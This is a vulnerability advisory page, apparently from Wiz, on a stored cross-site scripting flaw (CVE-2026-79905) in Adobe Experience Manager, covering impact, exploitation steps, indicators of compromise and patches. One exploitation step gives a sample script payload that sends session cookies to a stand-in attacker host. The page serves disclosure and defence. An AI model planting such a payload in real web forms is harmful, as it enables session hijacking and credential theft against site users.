Register for the AI for Security Summit: Join Figma, Perplexity & Wiz

CVE-2026-79905
Adobe Experience Manager vulnerability analysis and mitigation

Overview

CVE-2026-79905 is a stored Cross-Site Scripting (XSS) vulnerability in Adobe Experience Manager (AEM) that allows a low-privileged attacker to inject malicious scripts into vulnerable form fields. When a victim browses to a page containing the affected field, the injected JavaScript executes in their browser. Affected products include Adobe Experience Manager 6.5 (versions up to and including 6.5.24), Adobe Experience Manager 6.5 LTS (up to and including SP2), and AEM as a Cloud Service (versions up to and including 2026.7.0). The vulnerability was disclosed and patched on September 8, 2026, with a CVSS v3.1 base score of 5.4 (Medium) (Adobe Advisory, GitHub Advisory).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically of the stored (persistent) variant. A low-privileged attacker can submit malicious JavaScript payloads into vulnerable AEM form fields; the application fails to properly sanitize or encode this input before rendering it to other users. Exploitation requires network access, low privileges, and user interaction (a victim must visit the page containing the injected content), and the scope is changed — meaning the injected script can affect resources beyond the vulnerable component itself (Adobe Advisory, GitHub Advisory).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of other AEM users who view the compromised page, resulting in low confidentiality and low integrity impact with no availability impact. Potential consequences include session hijacking, credential theft, unauthorized actions performed on behalf of victims, and defacement of AEM-hosted content. Because the scope is changed, the injected script may affect resources or users beyond the directly vulnerable AEM component (Adobe Advisory, GitHub Advisory).

Exploitability

There is no known public proof-of-concept exploit and no evidence of in-the-wild exploitation as of the time of disclosure (Adobe Advisory). The NVD SSVC assessment confirms exploitation is "none" and the attack is not automatable. The EPSS score is approximately 0.277%, placing it in the 20th percentile for exploitation likelihood within 30 days. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (GitHub Advisory).

Exploitation steps

  1. Reconnaissance: Identify an Adobe Experience Manager instance running a vulnerable version (AEM 6.5 ≤ 6.5.24, AEM 6.5 LTS ≤ SP2, or AEM Cloud Service ≤ 2026.7.0) and obtain low-privileged user credentials.
  2. Identify vulnerable form fields: Log in with a low-privileged account and browse AEM authoring or public-facing pages to locate form fields that accept and persist user input without adequate sanitization.
  3. Inject malicious payload: Submit a stored XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into the vulnerable form field and save or submit the form.
  4. Trigger victim execution: Wait for or socially engineer a higher-privileged user or victim to browse to the page containing the injected field; the malicious script executes automatically in their browser.
  5. Harvest results: Collect stolen session cookies, credentials, or other sensitive data exfiltrated to the attacker-controlled server, potentially enabling session hijacking or further unauthorized actions (Adobe Advisory, GitHub Advisory).

Indicators of compromise

  • Logs: AEM access logs showing POST requests to form submission endpoints containing HTML/JavaScript tags or encoded script payloads (e.g., %3Cscript%3E, <script>, onerror=, javascript:) in form field parameters.
  • Logs: AEM error or audit logs showing unexpected content modifications to pages or form components by low-privileged accounts.
  • Network: Outbound HTTP requests from victim browsers to unknown or attacker-controlled domains shortly after visiting AEM pages, potentially carrying cookie or session data as query parameters.
  • File System / Content Repository: Presence of JavaScript tags or encoded script content stored within AEM JCR (Java Content Repository) nodes associated with form fields or page components.
  • Process/Browser: Unexpected redirects or resource loads to external domains triggered when authenticated users visit specific AEM pages.

Mitigation and workarounds

Adobe has released patches addressing this vulnerability: upgrade to AEM 6.5.25.0 or later, AEM 6.5 LTS SP3 or later, or AEM as a Cloud Service version 2026.8.0 or later (Adobe Advisory). As interim mitigations, administrators should implement a Content Security Policy (CSP) to restrict script execution, validate and sanitize all user input on form fields server-side, and restrict low-privileged user permissions to prevent modification of sensitive form components where possible. Applying the vendor patch is the recommended and definitive remediation.

Community reactions

The vulnerability was covered in CIS Security's advisory on multiple Adobe product vulnerabilities released in September 2026, noting the potential for arbitrary code execution across the Adobe product suite (CIS Advisory). Tenable published detection plugins for the vulnerability, and AUSCERT issued a bulletin (ESB-2026.10696) to notify its constituency. No significant independent researcher commentary or social media discussion has been identified beyond routine vulnerability tracking.

Additional resources


SourceThis report was generated using AI

Related Adobe Experience Manager vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-79905MEDIUM5.4
  • Adobe Experience Manager logoAdobe Experience Manager
  • cpe:2.3:a:adobe:experience_manager
NoYesSep 08, 2026
CVE-2026-75742MEDIUM5.4
  • Adobe Experience Manager logoAdobe Experience Manager
  • cpe:2.3:a:adobe:experience_manager
NoYesSep 08, 2026
CVE-2026-75741MEDIUM5.4
  • Adobe Experience Manager logoAdobe Experience Manager
  • cpe:2.3:a:adobe:experience_manager
NoYesSep 08, 2026
CVE-2026-75740MEDIUM5.4
  • Adobe Experience Manager logoAdobe Experience Manager
  • cpe:2.3:a:adobe:experience_manager
NoYesSep 08, 2026
CVE-2026-75739MEDIUM5.4
  • Adobe Experience Manager logoAdobe Experience Manager
  • cpe:2.3:a:adobe:experience_manager
NoYesSep 08, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management